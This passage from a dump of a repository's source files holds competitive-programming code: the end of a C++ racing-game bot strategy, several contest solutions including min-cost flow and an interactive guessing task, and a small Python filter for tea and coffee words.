!= 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int fi, fj, pi, pj;\r\n if (waypointIndex < int(wp.size()) - 1)\r\n {\r\n int cx = int(self.getX() / tileSize);\r\n int cy = int(self.getY() / tileSize);\r\n int wx1 = wp[waypointIndex][0];\r\n int wx2 = wp[waypointIndex + 1][0];\r\n int wy1 = wp[waypointIndex][1];\r\n int wy2 = wp[waypointIndex + 1][1];\r\n if (\r\n (cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n ||\r\n (cy == wy1 
&& cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n )\r\n ti = wp[++waypointIndex][0],\r\n tj = wp[waypointIndex][1];\r\n if (waypointIndex + 1 < int(wp.size()))\r\n fi = wp[waypointIndex + 1][0],\r\n fj = wp[waypointIndex + 1][1];\r\n }\r\n auto tt = world.getTilesXY()[ti][tj];\r\n double targetX = (ti + 0.5) * tileSize;\r\n double targetY = (tj + 0.5) * tileSize;\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int ti, int tj)\r\n {\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n queue<pair<int, int>> q;\r\n q.push({si, sj});\r\n while (q.size())\r\n {\r\n int u = q.front().first;\r\n int v = q.front().second;\r\n q.pop();\r\n if (u == ti && v == tj)\r\n {\r\n vector<pair<int, int>> path;\r\n pair<int, int> start = {si, sj};\r\n while (u != start.first || v != start.second)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back(start);\r\n reverse(path.begin(), path.end());\r\n return path;\r\n }\r\n for (int i = 0; i < 4; ++i)\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && dir[a[u][v]][i])\r\n if (d[u + dx[i]][v + dy[i]] == 10000)\r\n d[u + dx[i]][v + dy[i]] = d[u][v] + 1,\r\n prev[u + dx[i]][v + dy[i]] = {u, v},\r\n q.push({u + dx[i], v + dy[i]});\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path = getPath(si, sj, ti, tj);\r\n if (path.size() >= 2)\r\n pi = path[path.size() - 2].first,\r\n pj = path[path.size() - 2].second;\r\n else\r\n pi = si,\r\n pj = sj;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if (abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1)\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; 
i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n writeln();\r\n writeln(xxx);\r\n writeln();\r\n }\r\n#endif\r\n fi = ti;\r\n fj = tj;\r\n tie(ti, tj) = path[i];\r\n tt = a[path[i].first][path[i].second];\r\n targetX = (path[i].first + 0.5) * tileSize;\r\n targetY = (path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return\r\n + 5.28596 * pow(x, 8)\r\n - 49.1259 * pow(x, 7)\r\n + 189.037 * pow(x, 6)\r\n - 388.625 * pow(x, 5)\r\n + 458.98 * pow(x, 4)\r\n - 310.246 * pow(x, 3)\r\n + 110.424 * pow(x, 2)\r\n - 15.6552 * pow(x, 1)\r\n + 0.2;//идеально при малой скорости\r\n return\r\n + 7.16332 * pow(x, 8)\r\n - 67.0616 * pow(x, 7)\r\n + 260.855 * pow(x, 6)\r\n - 544.344 * pow(x, 5)\r\n + 655.525 * pow(x, 4)\r\n - 453.69 * pow(x, 3)\r\n + 165.888 * pow(x, 2)\r\n - 24.2604 * pow(x, 1)\r\n + 0.2; //хреново входит в поворот\r\n return\r\n + 1.68041 * pow(x, 7)\r\n - 14.0981 * pow(x, 6)\r\n + 47.7581 * pow(x, 5)\r\n - 82.7825 * pow(x, 4)\r\n + 76.7515 * pow(x, 3)\r\n - 36.3308 * pow(x, 2)\r\n + 7.15476 * pow(x, 1)\r\n + 0.2; //на скорости влезает, но задевает угол ~-2\r\n return \r\n - 0.57084 * pow(x, 10)\r\n + 10.9758 * pow(x, 9)\r\n - 91.814 * pow(x, 8)\r\n + 438.632 * pow(x, 7)\r\n - 1320.67 * pow(x, 6)\r\n + 2608.54 * pow(x, 5)\r\n - 3408.95 * pow(x, 4)\r\n + 2898.79 * pow(x, 3)\r\n - 1530.02 * pow(x, 2)\r\n + 451.546 * pow(x, 1)\r\n - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n//interpolate({0, 0.2}, {0.5, 0.4}, {0.75, 0.365}, {1, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -3/16}, {2, -1/4})\r\n if 
(temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n //if (temp2 > 2)\r\n //{\r\n //double angle = self.getAngleTo(targetX, targetY);\r\n //cout << angle << \"\\n\";\r\n //if (angle > -PI / 10 && angle < PI)\r\n //cout << \"FORCE TURN\\n\",\r\n //MAAAAAGIC = -1;\r\n //}\r\n if (temp2 < 0.5)\r\n MAAAAAGIC = 0.3;\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n //cout << temp / tileSize << \" \" << MAAAAAGIC << \" \" << cornerTileOffset << \"\\n\";\r\n auto pathtitj = getPath(ti, tj, fi, fj);\r\n#ifdef debug\r\n if (pathtitj.size() >= 2)\r\n fi = pathtitj[1].first,\r\n fj = pathtitj[1].second;\r\n writeln(si, sj, pi, pj, ti, tj, fi, fj);\r\n writeln(pathtitj);\r\n writeln();\r\n#endif\r\n auto changeCoords = [&](TileType type) {\r\n switch (type) {\r\n case LEFT_TOP_CORNER:\r\nlt:\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\nrt:\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\nlb:\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\nrb:\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\n if (pi == ti)\r\n if (ti + 1 == fi)\r\n goto lb;\r\n else\r\n goto rb;\r\n else\r\n if (pj == tj && pj == fj)\r\n nextWaypointY += cornerTileOffset;\r\n else\r\n if (ti + 1 == pi)\r\n goto lb;\r\n else\r\n goto rb;\r\n //if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first + 1 && pathtitj[1].second == pathtitj[0].second)\r\n //goto rb;\r\n //if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first - 1 && pathtitj[1].second == pathtitj[0].second)\r\n //goto lb;\r\n\r\n break;\r\n case BOTTOM_HEADED_T:\r\n if (pi == ti)\r\n if (ti + 1 == fi)\r\n goto lt;\r\n else\r\n goto rt;\r\n else\r\n if (pj == tj && pj == fj)\r\n 
nextWaypointY -= cornerTileOffset;\r\n else\r\n if (ti + 1 == pi) \r\n goto lt;\r\n else\r\n goto rt;\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second + 1)\r\n goto lt;\r\n //goto rt; \r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second - 1)\r\n goto lb;\r\n //goto rb;\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second + 1)\r\n goto rt;\r\n //goto lt; \r\n if (pathtitj.size() > 1 && pathtitj[1].first == pathtitj[0].first && pathtitj[1].second == pathtitj[0].second - 1)\r\n goto rb;\r\n //goto lb;\r\n break;\r\n default:\r\n break;\r\n }\r\n };\r\n changeCoords(tt);\r\n //cout << targetX << \" \" << targetY << \"\\n\";\r\n //cout << nextWaypointX << \" \" << nextWaypointY << \"\\n\\n\";\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (!forceBack)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(world.getTilesXY()[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 
1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n if (forceSlow)\r\n forceSlow--;\r\n countOfFails = 0;\r\n globalFail = 0;\r\n\r\n if (forceRight == 0)\r\n turn = getTurn(36);\r\n //if (speedModule * speedModule * fabs(angleToWaypoint) > 6 * PI && distToNext < DIST_TO_NEXT || \r\n double dd = speedModule / MAX_SPEED;// * 1.1;\r\n //cout << dd << \" \" << distToNext << \"\\n\";\r\n //if (dd > 1)\r\n //dd = 6;\r\n if ((distToNext < tileSize * dd && distToNext > tileSize) || forceSlow)\r\n if (isCorner(tt))\r\n move.setBrake(true);\r\n power = max(isCorner(tt) ? 1.0 : 1.0, distToNext / DIST_TO_NEXT);\r\n }\r\n }\r\n //else\r\n //if (changed && fabs(prevDistance - distToNext) < eps)\r\n //{\r\n //countOfFails++;\r\n //if (countOfFails > COUNT_OF_FAILS / 3)\r\n //forceRight = FORCE_RIGHT;\r\n //}\r\n //else\r\n //countOfFails = 0;\r\n move.setWheelTurn(turn);\r\n move.setEnginePower(power);\r\n for (auto car : world.getCars())\r\n if (!car.isTeammate())\r\n {\r\n //cout << self.getAngleTo(car) / PI * 180 << \"\\n\";\r\n if (self.getDistanceTo(car) <= tileSize)\r\n {\r\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\r\n move.setThrowProjectile(true);\r\n if (self.getAngleTo(car) + ANGLE_THROW * 2 > PI || self.getAngleTo(car) - ANGLE_THROW * 2 < -PI)\r\n move.setSpillOil(true);\r\n }\r\n }\r\n if (world.getTick() > 210 && distToNext > prevDistance)\r\n {\r\n forceSlow = FORCE_SLOW_DOWN;\r\n if (distToNext > tileSize * 5)\r\n forceSlow /= 2;\r\n }\r\n if (self.getRemainingOiledTicks() > 0)\r\n forceSlow = 0;\r\n if 
(world.getTick() > 210 && (distToNext > prevDistance && distToNext > tileSize * 5))\r\n move.setUseNitro(true);\r\n if (world.getTick() == 140)\r\n move.setUseNitro(true);\r\n}\r\n\r\nMyStrategy::MyStrategy() \r\n{\r\n dir[1][1] = dir[1][3] = true;\r\n dir[2][0] = dir[2][2] = true;\r\n\r\n dir[3][0] = dir[3][1] = true;\r\n dir[4][1] = dir[4][2] = true;\r\n dir[5][0] = dir[5][3] = true;\r\n dir[6][2] = dir[6][3] = true;\r\n\r\n dir[7][1] = dir[7][2] = dir[7][3] = true;\r\n dir[8][0] = dir[8][1] = dir[8][3] = true;\r\n dir[9][0] = dir[9][2] = dir[9][3] = true;\r\n dir[10][0] = dir[10][1] = dir[10][2] = true;\r\n\r\n dir[CROSSROADS][0] = dir[11][1] = dir[11][2] = dir[11][3] = true;\r\n freopen(\"lol\", \"w\", stdout);\r\n}\r\n\r\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})\r\n" }, { "alpha_fraction": 0.3108677268028259, "alphanum_fraction": 0.34203875064849854, "avg_line_length": 20.214284896850586, "blob_id": "40e6ee4d868206e8294b5d3da3edcd90bccd98eb", "content_id": "d01e7207690acdca815fcadeec83cfb3b7b694d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1187, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/EWA15.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \nusing namespace std;\n \nconst int MaxN = 4 * 100000;\nint a[MaxN];\n \n \nvector <pair <int, int> > ans;\nint main()\n{\n // freopen(\"in.in.c\", \"r\", stdin);\n int n, p = 0, q = 0;\n cin >> n;\n q = n;\n for (int i = 0; i < n; ++i){\n int x, y;\n cin >> x >> y;\n a[i] = x - y;\n if (a[i] > 0)\n p++;\n }\n int s = q - 2 * p;\n s++;\n if (s <= 0){\n cout << 0;\n return 0;\n }\n for (int ok = 0; ok < n - 1; ++ok){\n if (a[ok] <= 0 && a[ok + 1] <= 0){\n ok++;\n ans.push_back({ok - 
1, ok});\n } else\n if (a[ok] <= 0 && a[ok + 1] > 0 && (a[ok] + a[ok + 1] > 0)){\n ok++;\n ans.push_back({ok - 1, ok});\n } else\n if (a[ok + 1] <= 0 && a[ok] > 0 && (a[ok] + a[ok + 1] > 0)){\n ok++;\n ans.push_back({ok - 1, ok});\n }\n }\n if (ans.size() < s)\n cout << -1;\n else\n {\n cout << s << endl;\n for (int i = 0; i < s; ++i){\n cout << ans[i].first + 1 << \" \" << ans[i].second + 1 << endl;\n }\n }\n \n// freopen(TASKNAME\".out\", \"w\", stdout);\n}" }, { "alpha_fraction": 0.5112687945365906, "alphanum_fraction": 0.5313021540641785, "avg_line_length": 23.4489803314209, "blob_id": "99bf643d5c30e38e0c5be37f6319850ac260774f", "content_id": "517cf8a44e89058387ea46d40f1f140d5bb86fa0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2396, "license_type": "no_license", "max_line_length": 107, "num_lines": 98, "path": "/2019/GCJ1C/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... 
Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\n//Igorjan\n//}}}\n\nchar ask(int x)\n{\n cout << x + 1 << endl;\n char c;\n cin >> c;\n return c;\n}\n\nvoid run()\n{\n string ans;\n vector<int> positions(119);\n iota(whole(positions), 0);\n set<char> was;\n forn(q, 4)\n {\n map<char, vector<int>> m;\n for (int x: positions)\n m[ask(x * 5 + q)].pb(x);\n int mn = MOD;\n char add;\n for (auto& x: m)\n if (x.second.size() < mn)\n mn = x.second.size(),\n add = x.first;\n positions = m[add];\n ans += add;\n was.insert(add);\n }\n string temp = \"ABCDE\";\n for (char c: temp)\n if (was.find(c) == was.end())\n ans += c;\n swap(ans[3], ans[4]);\n cout << ans << endl;\n char c;\n cin >> c;\n if (c == 'N') exit(1);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n int t, f;\n cin >> t >> f;\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n //writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n" }, { "alpha_fraction": 0.49575871229171753, "alphanum_fraction": 0.5018849968910217, "avg_line_length": 21.817203521728516, "blob_id": "1190b3b5dd020355284da1dbf8d90964dd27be7f", "content_id": "301521c4ae34a826249f754257304c483d073eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2122, "license_type": "no_license", "max_line_length": 85, "num_lines": 93, "path": "/2014/gcj2014_0/A.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef CASE_HPP\n#define CASE_HPP\n\n#include <bits/stdc++.h>\n#include <QObject>\n#include <QRunnable>\n#include <QThread>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for 
(set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nclass Case : public QObject, public QRunnable\n{\n Q_OBJECT\n int first, second, n = 4, x, count = 0, ans;\n set<int> s[4], d[4];\n\npublic:\n void readInput(QTextStream &in)\n {\n in >> first;\n fori(n)\n forj(n)\n in >> x,\n s[i].insert(x);\n in >> second;\n fori(n)\n forj(n)\n in >> x,\n d[i].insert(x);\n }\n\n void writeResults(QTextStream &out)\n {\n out << \"Case #\" << case_number << \": \";\n switch (count)\n {\n case 0:\n out << \"Volunteer cheated!\" << \"\\n\";\n break;\n case 1:\n out << ans << \"\\n\";\n break;\n default:\n out << \"Bad magician!\" << \"\\n\";\n }\n }\n\n void solution()\n {\n first--;\n second--;\n fors(i, s[first])\n if (d[second].find(*i) != d[second].end())\n count++,\n ans = *i;\n }\n\n explicit Case() : QObject(0), solved(false) { setAutoDelete(false); }\n\n void run()\n {\n solution();\n solved = true;\n emit caseSolved(this);\n }\n\n inline bool is_solved() const { return solved; }\n inline void setCaseNumber(int n) { case_number = n; }\n\nsignals:\n void caseSolved(Case*);\n\nprivate:\n int case_number;\n bool solved;\n};\n\n#endif // CASE_HPP\n" }, { "alpha_fraction": 0.36684492230415344, "alphanum_fraction": 0.37754011154174805, "avg_line_length": 21.8216552734375, "blob_id": "58d7d38c446d47637547642af6ee96b2e9626586", "content_id": "71b38922c065ce325fac1b2ed156ea55a784c703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3740, "license_type": "no_license", 
"max_line_length": 102, "num_lines": 157, "path": "/trash/lab_da_smthng/mincost/maxflinfo.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\r\n#include <iostream>\r\n#include <stack>\r\n#include <vector>\r\n#include <stdio.h>\r\n#include <queue>\r\n#define enter printf(\"\\n\");\r\n#define ooo printf(\"o\\n\");\r\n \r\nusing namespace std;\r\n \r\nstruct edge\r\n{\r\n int y, c, f, p, opp;\r\n edge(int e, int r, int t, int u, int o)\r\n {\r\n y = e;\r\n c = r;\r\n f = t;\r\n p = u;\r\n opp = o;\r\n }\r\n edge(){};\r\n};\r\n \r\nvoid writeln(int a)\r\n{\r\n printf(\"%d\\n\", a);\r\n}\r\n \r\nconst int INF = 1000000002;\r\nvector<int> d, p, path, place, fi, ficur;\r\nvector< vector< edge > > edges;\r\npriority_queue< pair<int, int> > q;\r\nvector<bool> in, used;\r\nint s = 1;\r\nint f, u, v, w, curd, n, m, mn, dfi;\r\n \r\nvoid debug()\r\n{\r\n for (int i = 1; i <= n; i++)\r\n for (int j = 0; j < edges[i].size(); j++)\r\n printf(\"%d %d %d %d %d\\n\", i, edges[i][j].y, edges[i][j].p, edges[i][j].c, edges[i][j].f);\r\n}\r\n \r\nvoid FordBellman()\r\n{\r\n fi.resize(n + 1);\r\n in.resize(n + 1, false);\r\n fi[s] = 0;\r\n in[s] = true;\r\n queue<int> qfb;\r\n qfb.push(s);\r\n int u, v, w;\r\n while (!qfb.empty())\r\n {\r\n u = qfb.front();\r\n qfb.pop();\r\n in[u] = false;\r\n for (int i = 0; i < edges[u].size(); i++)\r\n {\r\n if (edges[u][i].c <= edges[u][i].f)\r\n continue;\r\n v = edges[u][i].y;\r\n w = edges[u][i].p + fi[u];\r\n if (fi[v] > w)\r\n {\r\n fi[v] = w;\r\n if (!in[v])\r\n in[v] = true,\r\n qfb.push(v);\r\n }\r\n }\r\n }\r\n for (int i = 1; i <= n; i++)\r\n for (int j = 0; j < edges[i].size(); j++)\r\n edges[i][j].p += (fi[i] - fi[edges[i][j].y]);\r\n }\r\n \r\nint dijkstra()\r\n{\r\n q.push(make_pair(0, s));\r\n d.clear();\r\n d.resize(n + 1, INF);\r\n used.clear();\r\n used.resize(n + 1, false);\r\n d[s] = 0;\r\n mn = INF;\r\n if (s == f)\r\n return 0;\r\n while (!q.empty())\r\n {\r\n u = q.top().second;\r\n curd = 
-q.top().first;\r\n q.pop();\r\n if (curd > d[u])\r\n continue;\r\n for (int i = 0; i < edges[u].size(); i++)\r\n {\r\n if (edges[u][i].c <= edges[u][i].f)\r\n continue;\r\n v = edges[u][i].y;\r\n w = edges[u][i].p;\r\n if (u == v)\r\n continue;\r\n dfi = d[u] + w;\r\n if (d[v] > dfi || !used[v])\r\n {\r\n d[v] = dfi;\r\n p[v] = u;\r\n mn = min(edges[u][i].c - edges[u][i].f, mn);\r\n place[v] = i;\r\n q.push(make_pair(-d[v], v));\r\n used[v] = true;\r\n }\r\n }\r\n }\r\n return (d[f] == INF || !used[f]) ? -1 : d[f];\r\n}\r\n \r\nint main()\r\n{\r\n freopen(\"mincost.in\", \"r\", stdin);\r\n freopen(\"mincost.out\", \"w+\", stdout);\r\n scanf(\"%d %d\\n\", &n, &m);\r\n f = n;\r\n edges.resize(n + 1);\r\n place.resize(n + 1);\r\n p.resize(n + 1);\r\n int x, y, c, pp, add;\r\n long long price = 0;\r\n for (int i = 1; i <= m; i++)\r\n {\r\n scanf(\"%d %d %d %d\", &x, &y, &c, &pp);\r\n edge r = edge(y, c, 0, pp, edges[y].size());\r\n edges[x].push_back(r);\r\n edge r1 = edge(x, 0, 0, -pp, edges[x].size() - 1);\r\n edges[y].push_back(r1);\r\n }\r\n fclose(stdin);\r\n FordBellman();\r\n while (true)\r\n {\r\n add = dijkstra();\r\n if (add == -1)\r\n break;\r\n for (int v = f; v != s; v = p[v])\r\n {\r\n edges[p[v]][place[v]].f += mn;\r\n edges[ edges[p[v]][place[v]].y ][ edges[p[v]][place[v]].opp ].f -= mn;\r\n }\r\n price += mn * add + fi[n] - fi[1];\r\n }\r\n cout << price << endl;\r\n fclose(stdout);\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.5486618280410767, "alphanum_fraction": 0.5523114204406738, "avg_line_length": 30.576923370361328, "blob_id": "728971fb58e81a2d746fd90fa11acd2cf8100341", "content_id": "21d92049aa730f10b1496ea3d69c0a8f0a29dadd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1032, "license_type": "no_license", "max_line_length": 101, "num_lines": 26, "path": "/2023/tin/8.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\nimport re\n\n\ndef 
find_ban_words(text: str) -> list[str]:\n ret = set()\n for c in ['чай', 'чая', 'чаю', 'чаи', 'чае', 'чайный', 'чайного', 'чайному', 'чайным', 'чайном']:\n if c in text:\n ret.add('чай')\n if re.match(r'.*горячий .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячего .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячему .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячим .*кофе.*', text):\n ret.add('горячий кофе')\n if re.match(r'.*горячем .*кофе.*', text):\n ret.add('горячий кофе')\n return list(sorted(ret))\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом.\n print(', '.join(find_ban_words(input_str)))\n" }, { "alpha_fraction": 0.31935882568359375, "alphanum_fraction": 0.3403205871582031, "avg_line_length": 18.780487060546875, "blob_id": "a6b11c416762755312faef1478336f9b08ba86f5", "content_id": "8f392f5af2cf9335e57b69548ab891c5fb562d69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 811, "license_type": "no_license", "max_line_length": 60, "num_lines": 41, "path": "/2016/snws1/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\nusing namespace std;\n\nvoid run()\n{\n string s;\n cin >> s;\n vector<int> a(26, 0);\n int prev = -1;\n int n = s.size();\n for (int i = 0; i < n; ++i)\n a[s[i] - 'a']++;\n if (*max_element(a.begin(), a.end()) > (n + 1) / 2)\n {\n cout << \"IMPOSSIBLE\" << \"\\n\";\n return;\n }\n for (int q = n; q > 0; --q)\n {\n int i = max_element(a.begin(), a.end()) - a.begin();\n if ((q & 1) == 0 || a[i] != (q + 1) / 2)\n {\n for (i = 0; !a[i]; i++);\n if (i == prev)\n for (++i; i < 26 && !a[i]; ++i);\n }\n cout << (char) (i + 'a');\n a[i]--;\n prev = i;\n }\n cout << \"\\n\";\n}\n\nint main()\n{\n int n;\n cin >> n;\n for (int i = 0; i < n; ++i)\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4732673168182373, "alphanum_fraction": 
0.4867986738681793, "avg_line_length": 33.431819915771484, "blob_id": "475f4f4c5ce8e16c8541af95b85758c0c93c3ffc", "content_id": "cfcd1ca4d40738a96d89b7e3415a26a975c8c18a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3030, "license_type": "no_license", "max_line_length": 928, "num_lines": 88, "path": "/CodeForce/0390/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d 